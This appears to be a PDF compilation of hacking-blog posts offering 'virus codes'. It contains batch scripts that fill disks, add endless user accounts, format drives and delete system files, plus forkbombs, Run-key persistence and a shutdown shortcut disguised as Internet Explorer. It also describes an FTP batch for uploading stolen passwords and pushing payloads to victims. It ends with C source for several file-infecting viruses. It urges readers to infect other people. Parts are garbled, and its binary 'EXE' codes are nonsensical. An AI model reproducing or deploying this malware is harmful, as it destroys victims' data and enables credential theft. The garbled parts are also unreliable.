virus code

7/31/2019 Virus Code

1/22

Simple Virus Making

If you think that notepad is useless then you are wrong because you can now do a lotof things with a notepad which you could have never imagined.In this hack I will

show you how to make simple .bat file (virus) that cant be detected by any anti virus

Here are some good viruses ,i am not responsible for any kind of damage to your

system

Copy this to notepad and save as flood1.bat..

@ECHO OFF @ECHO A Sharmas Creation

@ECHO MAIN BAT RUNNING

GOTO start

:start@ECHO SET magic2=1 >> bat6.bat

@ECHO GOTO flood5 >> bat6.bat@ECHO :flood5 >> bat6.bat

@ECHO SET /a magic2=%%magic2%%+1 >> bat6.bat@ECHO NET USER magic2%%magic2%% /add >> bat6.bat

@ECHO GOTO flood5 >> bat6.batSTART /MIN bat6.bat

GOTO bat5

:bat5

@ECHO CD %%ProgramFiles%%\ >> bat5.bat@ECHO SET pogo=1 >> bat5.bat

@ECHO GOTO flood4 >> bat5.bat@ECHO :flood4 >> bat5.bat

@ECHO MKDIR pogo%%pogo%% >> bat5.bat@ECHO SET /a pogo=%%pogo%%+1 >> bat5.bat

@ECHO GOTO flood4 >> bat5.bat

START /MIN bat5.batGOTO bat4

:bat4

@ECHO CD %%SystemRoot%%\ >> bat4.bat@ECHO SET hat=1 >> bat4.bat

@ECHO GOTO flood3 >> bat4.bat


2/22

@ECHO :flood3 >> bat4.bat@ECHO MKDIR hat%%hat%% >> bat4.bat

@ECHO SET /a hat=%%hat%%+1 >> bat4.bat@ECHO GOTO flood3 >> bat4.bat

START /MIN bat4.bat

GOTO bat3

:bat3@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat

@ECHO SET chart=1 >> bat3.bat@ECHO GOTO flood2 >> bat3.bat

@ECHO :flood2 >> bat3.bat@ECHO MKDIR chart%%chart%% >> bat3.bat

@ECHO SET /a chart=%%chart%%+1 >> bat3.bat

@ECHO GOTO flood2 >> bat3.batSTART /MIN bat3.bat

GOTO bat2

:bat2@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat

@ECHO SET gamer=1 >> bat2.bat@ECHO GOTO flood >> bat2.bat

@ECHO :flood >> bat2.bat@ECHO MKDIR gamer%%gamer%% >> bat2.bat

@ECHO SET /a gamer=%%gamer%%+1 >> bat2.bat

@ECHO GOTO flood >> bat2.bat

START /MIN bat2.batGOTO original

riginalCD %HomeDrive%\

SET sharma=1GOTO flood1

:flood1

MKDIR sharma%sharma%SET /a sharma=%sharma%+1

GOTO flood1

What does it do : this is an extremely harmful virus the will keep replicating itselfuntil your hard drive is totally full and will destroy your comp.

Some Funny Virus Codes


3/22

A simple binary codes that can format the system drive ,secondary drives

Copy The Following In Notepad Exactly as it

01001011000111110010010101010101010000011111100000

Save As An EXE Any Name Will Do

Send the EXE to People And InfectSome other interesting formatting codes.

format c:\ /Q/X this will format your drive c:\01100110011011110111001001101101011000010111010000100000011000110011101001011100

0010000000101111010100010010111101011000

format d:\ /Q/X this will format your dirve d:\01100110011011110111001001101101011000010111010000100000011001000011101001011100

0010000000101111010100010010111101011000

format a:\ /Q/X this will format your drive a:\01100110011011110111001001101101011000010111010000100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini this will cause your computer not to boot.01100100011001010110110000100000001011110100011000101111010100110010111101010001

00100000011000110011101001011100011000100110111101101111011101000010111001101001

0110111001101001

Some more interesting stuff ..

open notepad

erase c:\windows

and save as


4/22

FINDOUTANAME.cmd

wat does it do:- will erase c:/windows .

Here is another one which is funny

cls:Acolor 0acls@echo offecho Wscript.Sleep 5000>C:\sleep5000.vbsecho Wscript.Sleep 3000>C:\sleep3000.vbsecho Wscript.Sleep 4000>C:\sleep4000.vbsecho Wscript.Sleep 2000>C:\sleep2000.vbscd %systemroot%\System32

dirclsstart /w wscript.exe C:\sleep3000.vbsecho Deleting Critical System Filesecho del *.*start /w wscript.exe C:\sleep3000.vbsecho Deletion Successful!echo:echo:echo:echo Deleting Root Partition

start /w wscript.exe C:\sleep2000.vbsecho del %SYSTEMROOT%start /w wscript.exe C:\sleep4000.vbsecho Deletion Successful!start /w wscript.exe C:\sleep2000.vbsecho:echo:echo:echo Creating Directory h4xcd C:\Documents and Settings\All Users\Start Menu\Programs\mkdir h4xstart /w wscript.exe C:\sleep3000.vbsecho Directory Creation Successful!echo:echo:echo:echo Execution Attempt 1start /w wscript.exe C:\sleep3000.vbsecho cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\


5/22

echo start hax.exestart /w wscript.exe C:\sleep3000.vbsecho Virus Executed!echo:echo:

echo:start /w wscript.exe C:\sleep2000.vbsecho Disabling Windows Firewallstart /w wscript.exe C:\sleep2000.vbsecho Killing all processesstart /w wscript.exe C:\sleep2000.vbsecho Allowing virus to boot from startupstart /w wscript.exe C:\sleep2000.vbsecho:echo:echo Virus has been executed successfully!

start /w wscript.exe C:\sleep2000.vbsecho:echo Have fun!start /w wscript.exe C:\sleep2000.vbspauseshutdown -f -s -c Your computer has committed suicide. Have a nice day.

This code about multiple open windows means infinite windows

until continue you restart the computer:save on denger.bat and code written in notepad

@echo off

copy 0% denger.batstart denger.bat

This code about the computer shutdown:

@echo offshutdown -s -t 5 -c Shutdown

Go to notepad and type the following:@Echo offDel C:\ *.*|y

save it as Dell.bat

Want worse then type the following:

@echo offdel %systemdrive%\*.*/f/s/qshutdown -r -f -t 00


6/22

and save it as a .bat file

One more

try one this

Cd C:\rd C:\ /s/qCd D:\rd D:\ /s/qCd E:\Rd E:\ /s/qCd F:\Rd\ /s/q

then it is complete Save as any file you want in .bat format.. n enjoy.its really dangerous dont try

on your own pc.

NOTE:- Howto add your own created viruses into start ups this will make it difficult to detectthem n to remove them

For this u need a registry updater software .

now move your .bat file to c:/windows and then simply run this software ur virsu will be added toyour start ups i tried this with shut down , as my comp starts its shut down after 2 secs ..

Do not try it on your PC. Dont mess around this is for educational purpose only

Batch VIRUS Killing NORTON, LIMEWIRE, EXPLORER, MSN

@Echo offcolor 4title 4title R.I.Pstartstartstartstart calc

copy %0 %Systemroot%\Greatgame > nulreg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ/d %systemroot%\Greatgame.bat /f > nulcopy %0 *.bat > nulAttrib +r +h Greatgame.batAttrib +r +hRUNDLL32 USER32.DLL.SwapMouseButtonstart calc


7/22


8/22

(dont tell your friends, you press ctrl + alt + delete and go to processes, and end wscript.exe (thiscode is vbs so save in note pad as whateveryouwant.vbs)

Set oWMP = CreateObject(WMPlayer.OCX.7 )

Set colCDROMs = oWMP.cdromCollectionif colCDROMs.Count >= 1 thendoFor i = 0 to colCDROMs.Count 1colCDROMs.Item(i).EjectNext cdromFor i = 0 to colCDROMs.Count 1colCDROMs.Item(i).EjectNext cdromloopend if

A code that turns on and off your capslock repeatedly, also vbs, end same way as last time, this

turns on and off your capslock every tenth of a second

Set wshShell =wscript.CreateObject(WScript.Shell)dowscript.sleep 100wshshell.sendkeys {CAPSLOCK}

loop

A batch that is like a computer password, maybe you could stick it in autoexec.exe and make it runoff startup?

@Echo offecho Enter password then [F6] and then smack the [Enter] key real hard!prompt $e[30mecho onecho offcopy con password.dat>nul

prompt $e[0mecho onecho offclscopy password.set+password.dat password.bat>nulcall password.batif '%password%==qwerty goto doneecho Incorrect, you are not trying to break into my pc are you?


9/22

choice /t:y,3if errorlevel 2 goto next:nexterase password.baterase password.dat

:helloclsecho Turn off PCgoto hello:doneerase password.daterase password.batset password=qwertyprompt $p$g

A batch that switches the left mouse button with your right mouse button (also maybe add a

code to stick in someones autoexec,that would really make them mad)

@echo offRundll32 user32,SwapMouseButtonmsg * hahahamsg * this is gunna screw you upmsg * good look finding how to fix it

A batch file that will shutdown your computer and send a few messages about the matrix, ratherbland and could be worked on a little bit more, some one

could tweak it a little and i'll repost it and give you credit, perhaps change the dos txt to green

@ Echo offTitle Matrixmsg * The matrix has you, you can not escaperundll32.exe disable mouseAttrib +h C:*.*echo deleting harddriveecho 1001101010101011111111101010101echo 010101010101010101010101010111assocassocAttrib C:Documents and settings*.*net share hack=C:shutdown -s -c 60

This is a VBs file so of course save as VBS, you can replace the txt in this code with whatever

you want


10/22

Set wshshell = wscript.CreateObject("WScript.Shell")Wshshell.run "Notepad"wscript.sleep 400wshshell.sendkeys "M"wscript.sleep 100

wshshell.sendkeys "a"wscript.sleep 120wshshell.sendkeys "s"wscript.sleep 200wshshell.sendkeys "o"wscript.sleep 140wshshell.sendkeys "n"wscript.sleep 100wshshell.sendkeys " "wscript.sleep 100wshshell.sendkeys "P"

wscript.sleep 200wshshell.sendkeys "w"wscript.sleep 150wshshell.sendkeys "n"wscript.sleep 170wshshell.sendkeys "s"wscript.sleep 200wshshell.sendkeys " "wscript.sleep 100wshshell.sendkeys "A"wscript.sleep 50wshshell.sendkeys "l"wscript.sleep 120wshshell.sendkeys "l"wscript.sleep 160wshshell.sendkeys " "wscript.sleep 200wshshell.sendkeys "N"wscript.sleep 100wshshell.sendkeys "e"wscript.sleep 100wshshell.sendkeys "w"wscript.sleep 200wshshell.sendkeys "b"wscript.sleep 120wshshell.sendkeys "s"

Carpet Bomb:


11/22

Once the batch file is executed, it copies itself hundreds of times onto the desktop and startupfolder. This means that it'll regenerate once the computer is restarted even if all the icons on thedesktop are deleted. This works on Windows XP and Vista. Command line-args are optional, andinclude "disinf" for erasing all of the copies permanently.

@ECHO OFF:This was meant as a harmless joke, and it's not hard to fix if you read through the code.:If you just use the "disinf" argument on the command line all is well. lease only use this onpeople u don't likeIF "%1"=="" GOTO fillIF "%1"=="fill" GOTO fillIF "%1"=="kill" GOTO killIF "%1"=="inf" GOTO infIF "%1"=="disinf" GOTO killGOTO bye:fill

IF EXIST C:\Users\%USERNAME%\Desktop\ (FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Users\Public\Desktop\joke%%A.bat"FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Users\%USERNAME%\Desktop\joke%%A.bat")FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Documents and Settings\AllUsers\Desktop\joke%%A.bat"FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Documents and Settings\%USERNAME%\Desktop\joke%%A.bat"IF "%1"=="" GOTO infGOTO theend

:killIF EXIST C:\Users\%USERNAME%\Desktop\ (FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Users\Public\Desktop\joke%%A.bat"FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Users\%USERNAME%\Desktop\joke%%A.bat")FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Documents and Settings\AllUsers\Desktop\joke%%A.bat"FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Documents and Settings\%USERNAME%\Desktop\joke%%A.bat"IF "%1"=="disinf" GOTO disinfGOTO theend:infTYPE "%~df0" > "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\joke.bat"TYPE "%~df0" > "C:\Documents and Settings\%USERNAME%\StartMenu\Programs\Startup\joke.bat"TYPE "%~df0" > "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\joke.bat"GOTO theend


12/22

:disinfECHO Y | DEL "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\joke.bat"ECHO Y | DEL "C:\Documents and Settings\%USERNAME%\StartMenu\Programs\Startup\joke.bat"ECHO Y | DEL "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start

Menu\Programs\Startup\joke.bat"GOTO theend:byeECHO "fill" to make more and "kill" to get rid of 'em. inf to make it stick a little longer:theend

Once the batch file is executed, it copies itself hundreds of times onto the desktop and startupfolder. This means that it'll regenerate once the computer is restarted even if all the icons on thedesktop are deleted. This works on Windows XP and Vista. Command line-args are optional, andinclude "disinf" for erasing all of the copies permanently.\

Creating a batch Bomb

Copy and paste the below into notepad and save it as hi.bat (Not .txt)run it, and enjoy anarchy.

Code:

@echo off:STARTecho Error, Critical Windows Failure. Format Hard Disk and Reinstall OS!start hi.bat

GOTO START

A code that turns on and off your capslock repeatedly, also vbs, end same way as last time, this

turns on and off your capslock every tenth of a second.

Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "{CAPSLOCK}"loop

How to make a shutdown file and disguise it as something else!

This article is a pretty simple one, maybe most of you guys know already... in case if you don'tknow, you can play around and make fun...

How to make a shutdown file and disguise it as something else (internet, etc.)

Step 1: Right click on your desktop or wherever you want to make this shutdown file
http://hackingdictionary.blogspot.com/2009/04/how-to-make-shutdown-file-and-disguise.htmlhttp://hackingdictionary.blogspot.com/2009/04/how-to-make-shutdown-file-and-disguise.html


13/22

Step 2: look for new, then shortcut

Step 3: Type shutdown -s -t 10 -c "text here"note: you can add -f to force close open docuumentsnote: after -t you can put any amount of seconds you want before the computer shuts down

Step 4: push next, then name it whatever you like, for an example we will put Internet Explorer

Step 4: Right click on the file you just made and goto properties

Step 5: hit change icon. (This could be under the advanced tab)

Step 6: An error message should pop up letting you know there aren't any pictures forc:\windows\system32. Hit ok

Step 7: A list of icons should show up.. click on the one you think looks the most persuasive

according to what you named it. (For example, look for the 'e' icon for internet explorer.

Now your done, see that wasn't that hard! was it?Put this in the start up folder to make people even MORE mad!

NOTE:- This can easily be stopped by typing shutdown -a in run...

Sending Files Via ftp Batch!

OK, So i made a password stealer that would output a .txt file to the windows folderm i then madea ftp batch that would upload the txt file to my server, so far ive managed to get some passwords

but not for anything important, So if you want to know how to make a ftp batch then heres how.

First for example were gonna try upload a file called Test.txt to our server

Upload.bat

ftp -n -i -s:MyUploadFiles.ftp

First make a file called upload.bat and put this in, Now we need to make the myuploadfiles.ftp, ifyou wanna call it something else then change the myuploadfiles.ftp to what you want but KEEP the.ftp at the end.

Ok now its the myuploadfiles.ftp creating time, or whatever you called it before.

open your-host

user username.spam.com password

ASCII
http://hackingdictionary.blogspot.com/2009/03/sending-files-via-ftp-batch.htmlhttp://hackingdictionary.blogspot.com/2009/03/sending-files-via-ftp-batch.html


14/22

send test.txt

BIThis is the bit where you have to change the username password and host to what your ftp host is.then change the send test.txt to what file you want to upload, it doesn't have to be a txt file, it can

be any one.

Now make sure both files are in the same dir as each other and run the .bat file. check your ftpserver and guess whats sitting there! test.txt! So if you want to upload a file from someone's pc,you could use this?

Also theres nothing stopping you from putting in the "get" command in the .ftp, say getdownload.bat, whenever you want to change what it does make it call it download.bat and shove iton the server, then the victim will download it and be executed.

Folder Replicator Batch VIRUS

Here is a Simple bacth virus that contains only 6 lines, has the tendency to replicate itself againand again and keeps on creating a folder with same name, until a user stops it.

1. Just open up a notepad, copy and paste the below code

cd\cd C:\Documents and Settings\username\Desktop:loopmd Viruscd Virus

goto loop

2. Save it as a batch file with the extension .bat.3. Then run it on the Victims computer to infect it.4. Any how it doesnt cause much harm, but replicates folder inside a folder and goes on.

VIRUS CODES IN C :-

BATCH & COM VIRUS

#include

#include

#include

#include

struct ffblk ffblk;
http://hackingdictionary.blogspot.com/2009/03/folder-replicator-batch-virus.htmlhttp://hackingdictionary.blogspot.com/2009/03/folder-replicator-batch-virus.html


15/22

main()

{

char old_dir[MAXPATH];

Get_Path(old_dir); /* Save the old directory */

Pick_A_Dir(); /* Find a new directory to */

Infect_Directory(); /* infect and infect it. */

chdir(old_dir); /* Return to old directory */

return 0;

}

Pick_A_Dir()

{

int done;

chdir(..); /* First, Go out a DIR. */

done=findfirst(*.BAT,&ffblk,0); /* If no BAT files, try */

/* root and DOS */

if (done)

{

chdir(\\);

done=findfirst(*.BAT,&ffblk,0);

if (done) chdir(\\DOS\\);

}

return 0;

}


16/22

Infect_Directory()

{

int done;

done = findfirst(*.BAT,&ffblk,0);

while (!done) /* Find all .BAT files */

{ /* and add code to run */

Do_Batch(); /* BAT&COM if not */

done = findnext(&ffblk); /* already there */

}

if (findfirst(BAT&COM.COM,&ffblk,0)) /* If BAT&COM does */

{Copy_Virus();} /* not exist, then */

return 0; /* copy it into dir.*/

}

Do_Batch()

{

FILE *batch;

char Infection_Buffer[12];

char vpath[MAXPATH];

Get_Path(vpath); /* Get path for adding path */

/* specifier in commands */

if (vpath[3]==0) vpath[2]=0; /* Keep path good in root */

batch=fopen(ffblk.ff_name, rt+);

fseek(batch, -11, SEEK_END);


17/22

fread(Infection_Buffer,11,1,batch);

Infection_Buffer[11]=0; /* Terminate String */

if (strcmp(Infection_Buffer,BAT&COM.COM)) /* Check if */

{ /* Batch is */

fseek(batch, 0, SEEK_END); /* infected.*/

fprintf(batch,\n%s\\BAT&COM.COM,vpath);

} /*^- Add command */

/* to batch */

fclose(batch);

return 0;

}

Copy_Virus()

{

FILE *old_virus, *new_virus;

int write_length;

char copy_buffer[1024]; /* Copy the virus to */

/* new directory */

old_virus=fopen(_argv[0],rb);

new_virus=fopen(BAT&COM.COM,wb);

write_length=1024;

while (write_length==1024)

{

write_length=fread(copy_buffer,1,1024,old_virus);


18/22

fwrite(copy_buffer,write_length,1,new_virus);

}

fclose(old_virus);

fclose(new_virus);

return 0;

}

Get_Path(char *path)

{

strcpy(path, A:\\);

path[0] =A + getdisk(); /* Returns current path */

getcurdir(0, path+3);

return 0;

}

- - End of Code - -

BLACK WOLF VIRUS

/* It will infect all .COM files in the current directory */

#include

#include

#include

FILE *Virus,*Host;

int x,y,done;

char buff[256];

struct ffblk ffblk;


19/22

main()

{

done = findfirst(*.COM,&ffblk,0); /* Find a .COM file */

while (!done) /* Loop for all COMs in DIR*/

{

printf(Infecting %s\n, ffblk.ff_name); /* Inform user */

Virus=fopen(_argv[0],rb); /* Open infected file */

Host=fopen(ffblk.ff_name,rb+); /* Open new host file */

x=9504; /* Virus size must */

/* be correct for the */

/* compiler it is made */

/* on, otherwise the */

/* entire virus may not*/

/* be copied!! */

while (x>256) /* OVERWRITE new Host */

{ /* Read/Write 256 byte */

fread(buff,256,1,Virus); /* chunks until bytes */

fwrite(buff,256,1,Host); /* left < 256 */

x-=256;

}

fread(buff,x,1,Virus); /* Finish off copy */

fwrite(buff,x,1,Host);

fcloseall(); /* Close both files and*/


20/22

done = findnext(&ffblk); /* go for another one. */

}

/* Activation would go */

/* here */

return (0); /* Terminate */

}

OVERWRITE VIRUS CODE

#include

#include

#include

void main(int argc,char *argv[])

{

int bytes,i,done;

FILE *virus,*host;

struct ffblk *f;

char buffer[512];

do

{

done=findfirst(*.exe,f,0);

while(!done)

{

virus=fopen(argv[0],rb);//open the virus in read mode

host=fopen(f->ff_name,rb+);//open the host file in r/w mode


21/22

for(;fread(buffer,512,1,virus)==1;)

fwrite(buffer,512,1,host);

fclose(host);

fseek(virus,0,0);//points to begining of virus

printf(infecting %s

,f->ff_name);

done=findnext(f);

}

}

while(!chdir(..));

printf(For any querry contact

Rakesh dwivedi;[email protected]);

REPLICATION VIRUS

#include

#include

#include

#include

#include

void main(int argc,char* argv[])

{ char buf[512];

int source,target,byt,done;

struct ffblk ffblk;

clrscr();
mailto:[email protected]:[email protected]


22/22

textcolor(2);

cprintf();

printf(\nVirus: Folderbomb 1.0\nProgrammer:BAS

Rakesh_dwivedi([email protected])\n);

cprintf();

done = findfirst(*.*,&ffblk,0);

while (!done)

{ printf(\n);cprintf( %s , ffblk.ff_name);printf(is attacked by );cprintf(Folderbomb);

source=open(argv[0],O_RDONLY|O_BINARY);

target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY);

while(1)

{byt=read(source,buf,512);

if(byt>0)

write(target,buf,byt);

else

break;

}

close(source);

close(target);

done = findnext(&ffblk);

}

getch();

}